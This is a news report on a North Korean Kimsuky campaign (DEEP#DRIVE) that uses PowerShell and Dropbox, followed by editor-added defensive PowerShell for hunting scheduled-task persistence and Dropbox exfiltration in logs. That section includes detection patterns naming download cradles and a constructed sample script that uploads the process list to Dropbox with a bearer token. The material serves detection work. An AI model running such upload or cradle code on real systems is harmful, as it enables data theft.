February 13, 2025
North Korean APT43 Uses PowerShell and Dropbox in Targeted South Korea Cyberattacks

Feb 13, 2025 | Ravie Lakshmanan | United States

A nation-state threat actor with ties to North Korea has been linked to an ongoing campaign targeting South Korean business, government, and cryptocurrency sectors.

The attack campaign, dubbed DEEP#DRIVE by Securonix, has been attributed to a hacking group known as Kimsuky, which is also tracked under the names APT43, Black Banshee, Emerald Sleet, Sparkling Pisces, Springtail, TA427, and Velvet Chollima.

“Leveraging tailored phishing lures written in Korean and disguised as legitimate documents, the attackers successfully infiltrated targeted environments,” security researchers Den Iuzvyk and Tim Peck said in a report shared with The Hacker News, describing the activity as a “sophisticated and multi-stage operation.”

The decoy documents, delivered via phishing emails and posing as .HWP, .XLSX, and .PPTX files, are themed as work logs, insurance documents and crypto-related files to trick recipients into opening them, thereby triggering the infection process.

The attack chain is notable for its heavy reliance on PowerShell scripts at various stages, including payload delivery, reconnaissance, and execution. It’s also characterized by the use of Dropbox for payload distribution and data exfiltration.

It all starts with a ZIP archive containing a single Windows shortcut (.LNK) file that masquerades as a legitimate document, which, when extracted and launched, triggers the execution of PowerShell code to retrieve and display a lure document hosted on Dropbox, while stealthily establishing persistence on the Windows host via a scheduled task named “ChromeUpdateTaskMachine.”
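A defender reading the chain above will want to find the persistence step on their own hosts. The following is an added example written for this page, not code from the Securonix report or from the campaign: a PowerShell hunt over registered scheduled tasks. Only the task name "ChromeUpdateTaskMachine" comes from the report; the interpreter list and the download-cradle argument patterns are generic indicators chosen here and will need tuning for a given environment.

```powershell
# Added example (editor's code, not Securonix's): hunt for scheduled-task persistence that
# launches a PowerShell download cradle. Task name from the report; patterns are assumptions.

# Patterns worth a second look in a task action (-match is case-insensitive in PowerShell):
# download cradles, encoded/hidden execution, policy bypass, and the cloud host this campaign used.
$SuspiciousArgPatterns = @(
    'dropbox',                                  # Dropbox-hosted lure/payload (this campaign)
    '-EncodedCommand', '-enc\b', '-ec\b',       # base64-encoded command line
    '-WindowStyle\s+Hidden', '-w\s+hidden',     # no visible console window
    '-ExecutionPolicy\s+Bypass', '-ep\s+bypass',
    'DownloadString', 'DownloadFile',           # WebClient cradles
    'Invoke-WebRequest', '\biwr\b', 'Invoke-RestMethod', '\birm\b',
    'Invoke-Expression', '\biex\b'              # execute whatever was fetched
)

# Interpreters and LOLBins a task action would use to run such a cradle.
$InterpreterPattern = 'powershell|pwsh|cmd\.exe|mshta|wscript|cscript|rundll32|regsvr32'

function Test-SuspiciousTaskAction {
    # Returns the patterns the action hits; an empty array means nothing matched.
    param([string]$Execute, [string]$Arguments)
    $cmd = "$Execute $Arguments"
    if ($cmd -notmatch $InterpreterPattern) { return @() }
    $hits = @(foreach ($p in $SuspiciousArgPatterns) { if ($cmd -match $p) { $p } })
    return $hits
}

function Find-SuspiciousScheduledTasks {
    # Walks every registered task (run elevated so tasks under all paths are visible) and
    # reports actions that match a known-bad task name or any cradle pattern.
    param([string[]]$KnownBadNames = @('ChromeUpdateTaskMachine'))
    foreach ($task in Get-ScheduledTask) {
        $nameHit = $KnownBadNames -contains $task.TaskName
        foreach ($action in $task.Actions) {
            # COM-handler actions have no Execute/Arguments; they simply produce no hits here.
            $hits = @(Test-SuspiciousTaskAction -Execute $action.Execute -Arguments $action.Arguments)
            if (-not $nameHit -and $hits.Count -eq 0) { continue }
            $info   = $task | Get-ScheduledTaskInfo
            $reason = if ($nameHit) { 'known task name' } else { $hits -join ', ' }
            [pscustomobject]@{
                TaskPath    = $task.TaskPath
                TaskName    = $task.TaskName
                Author      = $task.Author
                RunAs       = $task.Principal.UserId
                Execute     = $action.Execute
                Arguments   = $action.Arguments
                LastRunTime = $info.LastRunTime
                Reason      = $reason
            }
        }
    }
}

# Offline check on a constructed action (not recovered campaign data) to see what a hit looks like.
# "SQBFAFgA" is the UTF-16LE base64 of "IEX".
Test-SuspiciousTaskAction -Execute 'powershell.exe' `
    -Arguments '-NoProfile -WindowStyle Hidden -EncodedCommand SQBFAFgA'

# Live hunt across the host:
Find-SuspiciousScheduledTasks | Format-Table -AutoSize
```

Two caveats. A task name is a brittle indicator, so the argument patterns carry most of the weight; and `Get-ScheduledTask` only reports tasks the Task Scheduler service still enumerates. A task whose security descriptor has been deleted from `HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree` is hidden from it, so cross-check against the GUID entries under `...\TaskCache\Tasks` and the XML files in `C:\Windows\System32\Tasks` when a host looks clean but behaves otherwise.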

One such lure document, written in Korean, pertains to a safety work plan for forklift operations at a logistics facility, delving into the safe handling of heavy cargo and outlining ways to ensure compliance with workplace safety standards.

The PowerShell script is also designed to contact the same Dropbox location to fetch another PowerShell script that’s responsible for gathering and exfiltrating system information. Furthermore, it drops a third PowerShell script that’s ultimately responsible for executing an unknown .NET assembly.

“The use of OAuth token-based authentication for Dropbox API interactions allowed seamless exfiltration of reconnaissance data, such as system information and active processes, to predetermined folders,” the researchers said.

“This cloud-based infrastructure demonstrates an effective yet stealthy method of hosting and retrieving payloads, bypassing traditional IP or domain blocklists. Additionally, the infrastructure appeared dynamic and short-lived, as evidenced by the rapid removal of key links after initial stages of the attack, a tactic that not only complicates analysis but also suggests the attackers actively monitor their campaigns for operational security.”

Securonix said it was able to leverage the OAuth tokens to gain additional insights into the threat actor's infrastructure, finding evidence that the campaign may have been underway since September 2024.
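Both the token-based Dropbox API traffic quoted above and the token reuse Securonix describes hinge on the same thing: the bearer token and the API endpoints sit in clear text in the PowerShell that ran on the victim. The following is an added example written for this page, not Securonix's code and not anything recovered from the campaign. It extracts Dropbox API indicators (endpoints, bearer token, remote folder) from a script block, scores the block, and optionally runs that over PowerShell Script Block Logging (Event ID 4104). Assumptions: the sample script block is constructed for illustration; the "sl." prefix is the one Dropbox currently uses for short-lived access tokens; and the property indices used for 4104 events follow that event's standard template (MessageNumber, MessageTotal, ScriptBlockText, ScriptBlockId, Path).

```powershell
# Added example (editor's code, not Securonix's): pull Dropbox API indicators out of a
# PowerShell script block and score it. Sample input below is constructed, not real malware.

function Get-DropboxApiIndicators {
    param([Parameter(Mandatory)][AllowEmptyString()][string]$ScriptText)

    # Dropbox API v2 hosts: api.dropboxapi.com for RPC/metadata calls,
    # content.dropboxapi.com for files/upload and files/download.
    $endpointRx = '(?i)https?://(?:api|content)\.dropboxapi\.com/2/[\w/]+'
    # Bearer value in an Authorization header: a literal token or the variable holding it.
    $bearerRx   = '(?i)Bearer\s+(\$\w+|[A-Za-z0-9._\-]{20,})'
    # Literal access tokens. Assumption: Dropbox short-lived access tokens carry the "sl." prefix.
    $tokenRx    = 'sl\.[A-Za-z0-9._\-]{20,}'
    # Dropbox-API-Arg JSON carries the remote path, i.e. the "predetermined folder" data lands in.
    $pathRx     = '(?i)Dropbox-API-Arg[^\r\n]*?"path"\s*:\s*"([^"]+)"'
    # Local reconnaissance the report says was exfiltrated: system info and process lists.
    $reconRx    = '(?i)Get-Process|tasklist|Get-ComputerInfo|systeminfo|Get-WmiObject|Get-CimInstance|whoami|ipconfig'

    $endpoints = @([regex]::Matches($ScriptText, $endpointRx) | ForEach-Object { $_.Value }           | Sort-Object -Unique)
    $bearers   = @([regex]::Matches($ScriptText, $bearerRx)   | ForEach-Object { $_.Groups[1].Value } | Sort-Object -Unique)
    $tokens    = @([regex]::Matches($ScriptText, $tokenRx)    | ForEach-Object { $_.Value }           | Sort-Object -Unique)
    $paths     = @([regex]::Matches($ScriptText, $pathRx)     | ForEach-Object { $_.Groups[1].Value } | Sort-Object -Unique)

    # Score: Dropbox endpoint plus bearer auth is the API pattern; an upload endpoint plus
    # recon commands in the same block is the exfiltration pattern the report describes.
    $score = 0
    if ($endpoints.Count -gt 0)                          { $score += 2 }
    if ($bearers.Count -gt 0 -or $tokens.Count -gt 0)    { $score += 2 }
    if ($ScriptText -match '(?i)/2/files/upload')        { $score += 2 }
    if ($ScriptText -match $reconRx)                     { $score += 1 }

    [pscustomobject]@{
        Score       = $score
        Endpoints   = $endpoints
        BearerRefs  = $bearers
        Tokens      = $tokens
        RemotePaths = $paths
    }
}

function Find-DropboxExfilInScriptBlockLog {
    # Runs the extractor over Script Block Logging (must be enabled by policy). Long scripts are
    # split across several 4104 events, so chunks are reassembled by ScriptBlockId first;
    # otherwise the token and the endpoint can land in different events and never score together.
    param([int]$MaxEvents = 5000, [int]$MinScore = 4)
    $filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 }
    # Property indices per the 4104 template: 0 MessageNumber, 2 ScriptBlockText, 3 ScriptBlockId.
    Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        Group-Object { $_.Properties[3].Value } |
        ForEach-Object {
            $text = ($_.Group | Sort-Object { [int]$_.Properties[0].Value } |
                     ForEach-Object { $_.Properties[2].Value }) -join ''
            $r = Get-DropboxApiIndicators -ScriptText $text
            if ($r.Score -ge $MinScore) {
                [pscustomobject]@{
                    ScriptBlockId = $_.Name
                    Time          = ($_.Group | Select-Object -First 1).TimeCreated
                    Score         = $r.Score
                    Endpoints     = $r.Endpoints -join ' '
                    Tokens        = ($r.Tokens + $r.BearerRefs) -join ' '
                    RemotePaths   = $r.RemotePaths -join ' '
                }
            }
        }
}

# Constructed sample (not real campaign code): a recon-and-upload script block in the shape
# the report describes. Single-quoted here-string, so $tok stays literal text.
$SampleScriptBlock = @'
$tok = "sl.AbCdEfGhIjKlMnOpQrStUvWxYz0123456789abcdefghijklmnop"
$hdr = @{
    Authorization     = "Bearer $tok"
    "Dropbox-API-Arg" = '{"path":"/rdata/procs.txt","mode":"add"}'
    "Content-Type"    = "application/octet-stream"
}
$body = Get-Process | Select-Object Name, Id | Out-String
Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method Post -Headers $hdr -Body $body
'@

Get-DropboxApiIndicators -ScriptText $SampleScriptBlock | Format-List

# Live: Find-DropboxExfilInScriptBlockLog -MinScore 4 | Format-Table -AutoSize
```

With a token in hand, a responder can do what Securonix describes: authenticate to the attacker's account and enumerate it (`users/get_current_account` and `files/list_folder` on api.dropboxapi.com) to scope the campaign and recover exfiltrated material. Clear that with counsel first, and move quickly, since short-lived tokens expire after a few hours and the report notes the operators pull links down soon after initial stages. The scoring thresholds are deliberately crude; legitimate Dropbox automation will hit the endpoint and bearer patterns, so the recon and upload terms are what separate it from exfiltration.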

“Despite the missing final stage, the analysis highlights the sophisticated techniques employed, including obfuscation, stealthy execution, and dynamic file processing, which demonstrate the attacker’s intent to evade detection and complicate incident response,” the researchers concluded.
